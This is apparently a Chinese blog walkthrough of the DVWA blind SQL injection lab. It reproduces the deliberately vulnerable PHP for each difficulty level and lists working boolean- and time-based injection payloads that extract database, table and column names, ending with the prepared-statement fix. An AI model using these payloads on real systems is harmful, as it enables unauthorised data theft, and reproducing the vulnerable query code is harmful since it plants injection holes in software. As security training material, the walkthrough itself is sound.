一、简介
SQL Injection(Blind),即SQL盲注,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。
手工盲注思路:手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注。
手工盲注步骤:
- 判断是否存在注入,注入是字符型还是数字型
- 猜解当前数据库名
- 猜解数据库中的表名
- 猜解表中的字段名
- 猜解数据
二、Low
1、服务器端代码
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
2、漏洞分析
Low级别的代码对参数id没有做任何检查、过滤,存在明显的SQL注入漏洞,同时SQL语句查询返回的结果只有两种:User ID exists in the database和User ID is MISSING from the database。
3、漏洞利用(基于布尔的盲注)
-
是否存在注入,注入是字符型还是数字型
输入 1 ,用户存在
输入 1’ and ‘1’ = ‘1 ,用户存在
输入 1’ and ‘1’ = '2 ,用户不存在,所以存在字符型注入。
-
猜解当前数据库名
想要猜解数据库名,首先要猜解数据库名的长度,然后挨个猜解字符。
1’ and length(database())=4 #,显示存在,说明数据库名长度为4
采用二分法猜解数据库名
输入 1’ and ascii(substr(database(),1,1))<100 #显示不存在,说明数据库名的第一个字符的ascii值不小于100(小写字母d的ascii值);
输入 1’ and ascii(substr(database(),1,1))>100 #显示不存在,说明数据库名的第一个字符的ascii值不大于100,说明第一个字符是’d’,同理可以猜解出其余三个字符。 -
猜解数据库中的表名
一个数据库可能包含多张表,首先猜解数据库中表的数量:
输入 1’ and (select count(table_name) from information_schema.tables where table_schema=database())=1 #,显示不存在,
输入 1’ and (select count(table_name) from information_schema.tables where table_schema=database())=2 #,显示存在,说明dvwa数据库有两张表
接着挨个猜解表名:
输入 1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=5#,显示存在,说明第一张表名称长度为5
输入 1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=117 # ,显示存在,说明第一个字符是’u’。
同理可以拆解出其余三个字符和另外一张表的名称。 -
猜解表中的字段名
输入 1’ and (select count(column_name) from information_schema.columns where table_name= ‘users’)=8 #,显示存在,说明users表存在8个字段。
输入 1’ and length(substr((select column_name from information_schema.columns where table_name= ‘users’ limit 0,1),1))=7 #,显示存在,说明第一个字段由7个字符构成,
每个字段的具体名称猜解方法不再累述。 -
猜解数据
同样采用二分法。
4、漏洞利用(基于时间的盲注)
- 判断是否存在注入,注入是字符型还是数字型
输入1’ and sleep(5) #, 存在明显延迟
输入1 and sleep(5) #, 不存在明显延迟,故存在字符型基于时间的注入。 - 猜解当前数据库名
输入 1’ and if(length(database())=4,sleep(5),1) # 感觉到明显延迟,说明数据库由4个字符构成
输入 1’ and if(ascii(substr(database(),1,1))=100,sleep(5),1) # 感觉到明显延迟,说明数据库名第一个字符是’d’,同理可以拆解出其余三个字符。- 猜解表名(过程与基于布尔的盲注类似,不再累述,下同)
- 猜解字段名
- 猜解数据
三、Medium
1、服务器端代码
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
//mysql_close();
}
?>
2、漏洞分析
Medium级别的代码使用mysqli_real_escape_string函数对特殊符号\x00,\n,\r,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,控制用户输入,可以通过捉包-----修改参数-----重放请求三个过程构造恶意参数,过程和Low级别累述,不再累述。
四、High
1、服务器端代码
<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
2、漏洞分析
High级别的代码利用cookie传递参数id,当SQL查询结果为空时,会执行函数sleep(seconds),目的是为了扰乱基于时间的盲注。同时在 SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果,依然可以通过捉包-----修改参数-----重放请求三个过程修改cookie参数,并通过注释符注释掉LIMIT 1,过程和Low级别代码类似,不再累述。
五、Impossible
1、服务器端代码
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
// Get results
if( $data->rowCount() == 1 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,Anti-CSRF token机制的加入了进一步提高了安全性。
2849
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
